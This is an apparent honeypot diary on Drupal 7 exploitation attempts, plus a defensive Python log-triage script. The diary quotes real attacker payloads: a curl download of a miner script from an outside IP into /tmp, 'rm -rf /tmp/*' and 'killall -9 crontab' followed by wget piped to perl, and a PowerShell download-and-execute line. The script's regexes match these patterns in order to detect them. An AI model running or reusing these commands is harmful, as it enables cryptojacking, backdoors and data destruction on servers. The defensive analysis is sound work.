9/22/2023
Drupal 7 exploit github

Pretty much as soon as the exploit became publicly available, our honeypots started seeing attacks that used the exploit. Ever since then, we are seeing waves of exploit attempts hitting our honeypots.

The very first request for "/user/register" we saw came on April 6th. At the time, our honeypot did not yet emulate Drupal. But the source was a tor endpoint, and it scanned for a wide range of vulnerabilities at the time:

185.220.101.21 - "GET /user/register HTTP/1.1" 404 446 "-" "Mozilla/5.0 (Windows NT 5.1 rv:7.0.1) Gecko/20100101 Firefox/7.0.1"

The request above is not consistent with the exploit. "/user/register" is often used to fingerprint Drupal. The first request that is consistent with the exploit arrived on April 13th. Note how it uses a fake referrer ("Baidu"). We know the referrer is fake because by clicking on a search engine link, you would not send a POST request. Kind of odd that this referrer is used and I am not sure how it would evade any filters.

Moving forward, here are some of the top exploit payloads we have seen so far:

Miners are #1

curl -o /tmp/.XO-lock 188.166.148.89:53/b.sh?DRUPAL[ip address]:80

This exploit downloads a crypto coin miner and then, in a second exploit attempt, starts it. These three commands are sent as two distinct exploit requests (first either the "curl" or the "wget" command, then followed by the execution). The configuration file for the miner indicates that it connects to the mining pool on port 444 or 443, and the IP addresses used so far are 188.166.148.89 and 217.182.231.56. As usual, it gains persistence by adding a cron job to restart the miner. It downloads a file from Github that implements a simple file upload feature. The attacker can now come back and upload additional files (backdoors). We saw about 200 requests like this:

Perl Bots Are Still a Thing

As a Perl fan, it is nice to see that IRC bots written in Perl are still "a thing".

rm -rf /tmp/*
killall -9 crontab
wget -qO - 166.63.127.154/asx|perl

Aside from many "vulnerability scanner" scripts that echo back a string to show the system is vulnerable, there was also one exploit attempt looking for Drupal running on Windows:

Powershell -Command (New-Object ).DownloadFile('','asdf.exe') (New-Object -com Shell.Application).ShellExecute('asdf.exe')
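As an added example that is not part of this diary and not the honeypot's own tooling, here is a small Python triage script that applies the observations above to access-log lines and captured payloads: it flags requests to "/user/register" (the Drupal fingerprint path), flags POSTs that carry a search-engine referrer (a real click on a search result never produces a POST, which is how the "Baidu" referrer was recognised as fake), and breaks a captured command into its fetch and execute pieces. The log-line pattern, the search-engine host list, the sample client addresses 203.0.113.7 and 198.51.100.9, and the shape "sh /tmp/.XO-lock" assumed for the follow-up execution request are all my assumptions; the 185.220.101.21 line and the curl and perl-bot commands are the ones quoted in the diary.

```python
import re
from urllib.parse import urlparse

# Tolerant pattern for Apache/nginx "combined" style access-log lines. It also
# accepts the shortened form quoted in the diary (client IP, request in quotes,
# status, size, referrer, user agent) because everything between the IP and the
# first double quote is skipped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+)\s+[^"]*"(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+HTTP/[\d.]+"\s+'
    r'(?P<status>\d{3})\s+(?P<size>\S+)\s+"(?P<referer>[^"]*)"\s+"(?P<ua>[^"]*)"$'
)

# Assumed list of search-engine referrer hosts. A visitor arriving from a
# search result only ever sends a GET, so a POST with one of these referrers
# is forged (the diary's reasoning for the fake "Baidu" referrer).
SEARCH_ENGINE_HOSTS = ("baidu.com", "google.", "bing.com", "yandex.")

# Pieces of a download-then-execute payload: a curl/wget fetch (or a PowerShell
# DownloadFile call), and an execution step (sh on a file under /tmp, piping
# into an interpreter, or ShellExecute as in the Windows attempt).
FETCH_RE = re.compile(r'\b(curl|wget)\b[^;|&]*|\bDownloadFile\([^)]*\)', re.I)
EXEC_RE = re.compile(r'(\bsh\s+/tmp/\S+|\|\s*(perl|sh|bash)\b|ShellExecute)', re.I)


def parse_log_line(line):
    """Return the fields of one access-log line as a dict, or None."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_fake_search_referer(method, referer):
    """A search-engine referrer on a non-GET request cannot be genuine."""
    host = urlparse(referer).netloc.lower()
    if not host:
        return False
    return method.upper() != "GET" and any(s in host for s in SEARCH_ENGINE_HOSTS)


def triage(line):
    """Tag one log line with the indicators discussed in the diary."""
    rec = parse_log_line(line)
    if rec is None:
        return ["unparsed"]
    tags = []
    path = rec["path"].split("?", 1)[0].rstrip("/")
    if path == "/user/register":
        tags.append("drupal_fingerprint")       # path used to fingerprint Drupal
        if rec["method"] == "POST":
            tags.append("post_user_register")   # exploit traffic is POSTed
    if is_fake_search_referer(rec["method"], rec["referer"]):
        tags.append("fake_search_referer")
    return tags


def download_and_execute_indicators(cmd):
    """List the download-and-execute pieces a captured command contains."""
    found = ["fetch:" + m.group(0).strip() for m in FETCH_RE.finditer(cmd)]
    if EXEC_RE.search(cmd):
        found.append("exec")
    if "/tmp/" in cmd:
        found.append("touches_tmp")
    return found


# Constructed sample lines: the first mirrors the request quoted in the diary,
# the other two are made up to show a forged-referrer POST and a benign GET.
SAMPLE_LOG = [
    '185.220.101.21 - "GET /user/register HTTP/1.1" 404 446 "-" '
    '"Mozilla/5.0 (Windows NT 5.1 rv:7.0.1) Gecko/20100101 Firefox/7.0.1"',
    '203.0.113.7 - - [13/Apr/2018:11:22:33 +0000] "POST /user/register HTTP/1.1" '
    '200 512 "http://www.baidu.com/" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Apr/2018:12:00:00 +0000] "GET /index.php HTTP/1.1" '
    '200 2048 "https://www.google.com/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(triage(line), line[:60])
    # The miner payload quoted in the diary, then the assumed shape of the
    # second request that executes what the first one downloaded.
    print(download_and_execute_indicators(
        "curl -o /tmp/.XO-lock 188.166.148.89:53/b.sh?DRUPAL[ip address]:80"))
    print(download_and_execute_indicators("sh /tmp/.XO-lock"))
```

The two-request pattern the diary describes (fetch first, execute second) is why the indicator function reports the fetch and the execution step separately: on a real log each half arrives in its own request, so correlating them by client address and /tmp path is what turns two low-confidence hits into one confident one.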